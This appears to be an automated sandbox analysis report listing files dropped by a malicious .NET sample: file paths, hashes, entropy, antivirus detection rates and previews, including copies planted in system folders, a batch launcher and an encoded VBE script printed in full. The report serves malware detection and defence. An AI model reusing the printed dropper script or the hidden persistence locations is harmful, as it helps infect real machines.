                                                                                            Preview:QcOxsIv7GnvpKeetRKCSMYVLtz2FyJ0lq8FuJStyT8GtM4AEjPyPXpL1GCE3QqI6xK9LYtk8bO9OSl9zyyfjVlNAxOnGO0imzJ6B4zpzpzxJq6ifDPEcLjlL68XKGdtlpWYJo749Ip4fxDT0pID9vGbQivE5bftLGMdUhZ0FVFTfpFX3pgf8auzj4Ik328in6sZkj9SPR7oqw6lcXLQ49uvVW3aZy7MWgqi6qwTqNPqcGJx8hHfrrnnL7DNpj3aUvRJGXowl1kquESPNGb2qbep3CX9ninGUyVrzArk3V4zH63HoyAjHBt3QlPDAoJCNdW5slZMZ18Vhpi6JQVyiE9SFcaNvnkOM1lnj8YCYyJQCYVlDS4uTUeJeDzQLMbvQ

                                                                                            C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................R...6......Np... ........@.. ....................................@..................................p..K.................................................................................... ............... ..H............text...TP... ...R.................. ..`.sdata.../.......0...V..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Program Files\Windows Defender\bc31d5a79a9161

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):189
                                                                                            Entropy (8bit):5.6833855810659735
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:mSRcaPDdvMeHe7iaWcq497kwv6Iq+FHAUA7sU/V+cDWs87OmROQBHn:mSR17dvxHdNo7ka6IBHXshU7OmR5x
                                                                                            MD5:50D16B77326BA7C4A1B7DA7B4B55EAAF
                                                                                            SHA1:244130519650AFEEB81A6931A8BA328060CA8C77
                                                                                            SHA-256:6E16FEADB42323C923EA7B7381A7DB77BAB763C3DE4C546A3974A8B8C5FE3BCE
                                                                                            SHA-512:8894D0275FADC29CBED5AE175501ED01134F1D9EB600AC95FD71987A5151A0A2A98CF05DC18C275A87F041F272F31988448616BFD9DCE2579154FAE416EE6636
                                                                                            Malicious:false
                                                                                            Preview:Uv7kM5rW9VSrZsEAoXrusAhoqEWgTj1NbO4lg1LNd25e0ZRKcI9xSvcTOT3IiLDZdFQKxdewMeRzFDyRxMDKjD4qwlWM8CoSzfAvJGW9nMlydmNKflVWH20aKjYLGRyJz9AkDCIqzEgWcGMJYMrWrSK7pjljsL2WYb8emnHcdogCVd7DXOx4kccgyC4db

                                                                                            C:\Program Files\Windows Defender\lmXqPxTfNHomnnafzTOKZnFns.exe

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................R...6......Np... ........@.. ....................................@..................................p..K.................................................................................... ............... ..H............text...TP... ...R.................. ..`.sdata.../.......0...V..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\ssh\ML9lnBLRkA6sXD0.bat

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\6uPVRnocVS.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):32
                                                                                            Entropy (8bit):4.054229296672174
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:I5aREyR5AEn:I8jcEn
                                                                                            MD5:4D4409A367EF4772862BEA99E3E105B1
                                                                                            SHA1:EF19882A87BB8E86D100008E70F81D42C722BE9C
                                                                                            SHA-256:C0A3379F12D6D1B19373734F78EE5F83A30F09AD56D8B53ED68AD7FE1648EBD7
                                                                                            SHA-512:7851EC4BC41AEDA00384AAA3A6DB48C76F0BB4E7EA7F90172796014C2D69ED02E9FD0FB985A2E7371ABD58B1FD05C1E7FC8FBF243099932296B3C8DC5BEEB285
                                                                                            Malicious:false
                                                                                            Preview:"C:\\ProgramData\ssh\System.exe"

                                                                                            C:\ProgramData\ssh\System.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\6uPVRnocVS.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................R...6......Np... ........@.. ....................................@..................................p..K.................................................................................... ............... ..H............text...TP... ...R.................. ..`.sdata.../.......0...V..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\6uPVRnocVS.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):209
                                                                                            Entropy (8bit):5.804005977208473
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:GxWvwqK+NkLzWbHa/JUrFnBaORbM5nCSh5gOO2EGcN1a0ZRWs:GxFMCzWLauhBaORbQCSvO2i3T1
                                                                                            MD5:FB2FC99109E35AA3774B04520DEB87F4
                                                                                            SHA1:1B1015EBF673817FBCEE6B66EFD432AF5D51DBFF
                                                                                            SHA-256:4A983C159C5B21D11C880FBFECBB7CB68304B15544C498092A980DEEAF3B01B8
                                                                                            SHA-512:9761994364DC66A9229ACEACF3079EFE6CB24BAF9DC831B2C4D97D36A6F5F3A6C5E9A9FCDBA9D67CD66235723DAC6CC80DE40349F989F629CE0CF93C234DFE8E
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Preview:#@~^uAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z&hDKoDm:GCYmzd/4z\JOVx~JI0bvkp9!c4mYE~~TBPWl^d+czkAAA==^#~@.

                                                                                            C:\Recovery\6ccacd8608530f

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):68
                                                                                            Entropy (8bit):5.160704752887784
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:RnHmNV3mEst+eh1gnfpT/NyHfWEn:wNVjNehanRbgHfln
                                                                                            MD5:0F4077F402EF6344FB7F2E3237E3D345
                                                                                            SHA1:D0FDBD57DD26C8923F4F5E841006B88946FDD7C1
                                                                                            SHA-256:75F0DC9D5E03E19AAFCA14F919B625FC175AE988E5F3F9A3C9B6A72550E211B6
                                                                                            SHA-512:4962BA43F0C8DB79714F48C78246912CB889E8795C6BD1CAFDA7402BDE0034BF0544963D4D57B2D601B8DB94FFFDCFEB2C2E3CF8EA9F96DC9B8074858508A984
                                                                                            Malicious:false
                                                                                            Preview:8rJNDTbChaKPRY4Toi3UraUsuHUnF0U5Ww71IxJ7h7Gbz4Yf16V3eIWhWbc58x7qGP3f

                                                                                            C:\Recovery\Idle.exe

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................R...6......Np... ........@.. ....................................@..................................p..K.................................................................................... ............... ..H............text...TP... ...R.................. ..`.sdata.../.......0...V..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Recovery\bc31d5a79a9161

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with very long lines (752), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):752
                                                                                            Entropy (8bit):5.898800312713616
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:5/AmEtRwKhzsdZtFEPSzs5lIz6qVVkq1Ng0UGEdKQX01QIFWBEUD9sieZQnTxfUm:qdwLZf7sCbVkq1S0hEdNX0aIUD91Txcm
                                                                                            MD5:F06C7C9B7DA921CD336D538F17AAD421
                                                                                            SHA1:4F1C42EC6ABA42CD37062E6696C2C8D81D57AB22
                                                                                            SHA-256:0F96287E13AE5F1C4D8871CCF66E65F0C079AE4F2EF289EE429470F1BDC2DA69
                                                                                            SHA-512:80EC64F9A1EE7643C431CCD9C0DCF139B2EC71278AB0E5DDF2B266C99B5C2743C1FE4681B4333A67D0F2E0E0AA6A7374C8D795B585BD0A6C37F3BAD76702D359
                                                                                            Malicious:false
                                                                                            Preview:U330tzwJeabOaZeqUO8u9ZUjB3DyveeiVlNdimMJBxMpypEBiegK6Cu4iTy0v7XA622yLBIrBzsLNovVyBPR7TlS1T4OyVXEaLt5wQ0hVzIHUiq3hcBtrGCmRk72G33qcovB50jiLs5HKe8SmArVTnWTIHnMS8ab6copwp8r3di9L5bxmpPFMhWySc2xMWPNReLrzSf7C9b0FWINp0jnsVOYG0XUwKfhOUrqtu7UJRDNGfs5UoIVwme6Pxk94LL1e4lupbe52PdaSBRkHcAHCJul0vb6J8Z8GLsM47Q2KMchIDoNf91cLDzUJ9439hw4zfUGSFqJLH7zrNdwGNbJH7wDVYC4DW3mairmth4ZTrQEG9n6gHwvGnw2tRu4CwGzOUZIg0DjTB0Zrs6WvGX5jHgxvz3cwAXglb0wkeapENcExXKAUYI6ZKPGylXq7lwSoTxP2KvRps1VobAXo2HY1bHbMt88GtscbKadk5IJn1QrS3cWl9CEdYaNMVDIMwK69Z4eAgxtu7uAKZJSRlXHrn9DtNQP1971rTr297VEMSUfnaCwLu1kZCOWa0uxQi2uA3S0sQTTQS4YSdZTKeDGHWcoEUcINiyoajfuHLD4biUGH0E6bbmwevmnbowYyLGseQ8t7pL9aIojCVgOQfrv5CJp62SdZpGQbmm12U9vQmVWGDlFHhHSeVwbHTwFWrkuCYIZtpW5g5fSqxi3RMW2hxwGzKtii3YiClTr4LWbKMwizevU

                                                                                            C:\Recovery\ea1d8f6d871115

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):97
                                                                                            Entropy (8bit):5.46173111029117
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:/rUtwxofqxAH23BbsZD0YX3Vhn:AtwxoHyBbU4I3Vh
                                                                                            MD5:83D62408A0AF624CD1B374FCF9B93BBA
                                                                                            SHA1:B96F0431FAA45519D3502660117500B4252D3F7B
                                                                                            SHA-256:579634C1C1754FB71DE6AD745D48FC9EC0A43202C22AA717D80DA9BAD056E1F3
                                                                                            SHA-512:CA176B96EDDAA4B4C1D76616085A615FA68732B7E6B63C9697FF32EE5420E8D8BA23C52D6640480EA815CAAAA91E77EC3D8E3A626319EE6987F085B8B238D27F
                                                                                            Malicious:false
                                                                                            Preview:04rVBNQVYZypEONUYEF2lxfWzJB2Oq034tTaA1NYvNKg9riSt4qZuGdCZVf1LXHsj4vV4wUg0qHXn9XIltJT9aJxPQBoWWMXG

                                                                                            C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................R...6......Np... ........@.. ....................................@..................................p..K.................................................................................... ............... ..H............text...TP... ...R.................. ..`.sdata.../.......0...V..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Recovery\upfc.exe

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................R...6......Np... ........@.. ....................................@..................................p..K.................................................................................... ............... ..H............text...TP... ...R.................. ..`.sdata.../.......0...V..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\Default\AppData\Roaming\bc31d5a79a9161

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with very long lines (971), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):971
                                                                                            Entropy (8bit):5.917091070972345
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:kZuEG8Ozwn/fbJeDYBNiVeC2eOZnNMVyPopQYgGzv3n:kZu1zAzJ5iVSeOzNPGEGT
                                                                                            MD5:22AFF065E8BFDFC5AEB11738197D2136
                                                                                            SHA1:4EFD0655004CAB9F03E8C14799FB94EF8DB141AE
                                                                                            SHA-256:456308AF5894BEC51DD27C024B1F0B1E6DBA2CE439A31C6585342976F1B95E55
                                                                                            SHA-512:24D04A1F94F77B52E37F971B5188A4D85528090E9C7FE50ED03C22FFB9BA44009F86101AD95CFADA3EDDC8542DC6634E5306870AD60D07566B5155738BA8EBB8
                                                                                            Malicious:false
                                                                                            Preview:yu1SHtgAWY139VOVoEmfOQ89q9F00wZ05G0iHgwmNmczzjU2dQ4NYTtiw2lHopJk9B82epOHR9RmxIKHoMXk1LcmWSwP5p7ic20xlbYxBw5YBHvnsdccRisxjWgM38MmBtJ5SWgNykiEPDkPhJhbMfQ3JCOO5M4DkTWS7zUV7Por9oifvRotbvagdQvPHRRlpfe6qSRryLd71i3fesdnhKmy20yrEFNp7CCeKlzd974PRdp5WQvZynEe3pD0dknt7x9ygZV239okPWhZK3VyUy1T7hlei8AZTLSdd0Z742gy9ePgHnpjPyZJ6p09y0U49OQEED6UeX3bRCUdSEW4TaKfwIhx9ZIEimzvOKcErVF15714VXrtdZkiDvR5gIUEPz3pMiPHmSN8UTjzRnbmsYkIBRrc3ghiABlGELrxHkHLLmNtLco3qrV0Oun50wNFuo7TrcvF5oeIRZ6ZD8Qb2o1Spv2Tiw6UWBago3Bsri7CMMjyxO12fwNGxpo6kbhJsKwP9avJ6itTqzFcMDfT4DyjyUt9PFIPByTCaTzXcr67C4Z7jLuh5NOoVMaoqv40ZeR1fDC2NI1MG1h34vaDVkUykorN3KrrxFiimhcgJ1TxWBhepgu4V0fzKdR1Vy9CbKZBS8RWT34dQgbiGMiWawV6ksYJQlKU2RVMlgLqPXlc6CinBsuIQnmoydbkkIGstkk9LP7kB1GCL3AhKvHh0BDPpqXIFlGHR2tVbicwvKHYgjd5c3ZzAi1rgVUe2yeav8vSKoGlSVwq4psFNbpLLRGsABzFO846prnhxKvyxxgpwLw1mOQaJSOe1DSIzAXUbzBNBKSCq1YXub5zP7c9rexWcJpt2n8waLO7Jjzc6OtR40taHc21hXn7Bpv2fiJD3m7jN8pqIADcugclZPmauGODiR5ey66XEqYS3KMIwMthTKMfNJcP6tSwX3B6DL2MDqXEIKrPCdn

                                                                                            C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................R...6......Np... ........@.. ....................................@..................................p..K.................................................................................... ............... ..H............text...TP... ...R.................. ..`.sdata.../.......0...V..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\Default\bc31d5a79a9161

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with very long lines (366), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):366
                                                                                            Entropy (8bit):5.835215202803588
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Ijl3HoLT7INxnOScgHgPa+SQUmrHqKI0IqNnJDBn1azA+KVQtb2Q2+UsqlUTtzae:I5XMTENp7cTeBm1I6nJVn1as+OXRWtme
                                                                                            MD5:73A6CA03CA9170D2D43FCFA80860A4DC
                                                                                            SHA1:36A7040735A6A7C9BAF79789D0A0E6FEFFFCD2A5
                                                                                            SHA-256:D76CBC9A95D2D6BDBE2237CBED9EBA5ACD71BFF641BA6659AF387FD85976A9B1
                                                                                            SHA-512:E7ACAD37288E94741C0488696F02BE1FB30343DAF58FA1C4D48464C5B442BCC747D7853E9F99F4181A11BE122A77BFE9E335D2B8D726E01177533FCE282B91C1
                                                                                            Malicious:false
                                                                                            Preview:5xksaRZILI0MzTzVrmtsVBLRuNgO6dXMWWkO7f7Vpzege1qjotiHSvA3lS8NvLMrvnzdslXMpXDghpx2g6kM5P4lVqmogujdmwu1CN0DVVc4reW5fGqyl9wftOHB8tq5yk3v46zTFh0jx941UqJaDu2n9PHxFzEmphGHklBjQXtEIMrtUQrRkP1DrQvpyBOQcN3Q3wQspjJqByewhYdyHxCZpCZU0VvOIcl4Tb0hA8lAGKB2v8HZiZIoLdk0X62Ty5hiMjdGi6yJLCTfBgj1OVqtU6tz19KDFRLKndpLeB1lk9dIKFz0WBFdPyOQ0oOiwuD41J1i1XXNdEIUdkpwKTqEMr5yOZVzwTy06jRANR99n1

                                                                                            C:\Users\Default\lmXqPxTfNHomnnafzTOKZnFns.exe

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................R...6......Np... ........@.. ....................................@..................................p..K.................................................................................... ............... ..H............text...TP... ...R.................. ..`.sdata.../.......0...V..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Idle.exe.log

                                                                                            Download File
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:CSV text
                                                                                            Category:dropped
                                                                                            Size (bytes):1281
                                                                                            Entropy (8bit):5.370111951859942
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1915
                                                                                            Entropy (8bit):5.363869398054153
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpvJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpB1Gq2
                                                                                            MD5:5D3E8414C47C0F4A064FA0043789EC3E
                                                                                            SHA1:CF7FC44D13EA93E644AC81C5FE61D6C8EDFA41B0
                                                                                            SHA-256:4FDFF52E159C9D420E13E429CCD2B40025A0110AD84DC357BE17E21654BEEBC7
                                                                                            SHA-512:74D567BBBA09EDF55D2422653F6647DCFBA8EF6CA0D4DBEBD91E3CA9B3A278C99FA52832EDF823F293C416053727D0CF15F878EC1278E62524DA1513DA4AC6AF
                                                                                            Malicious:false
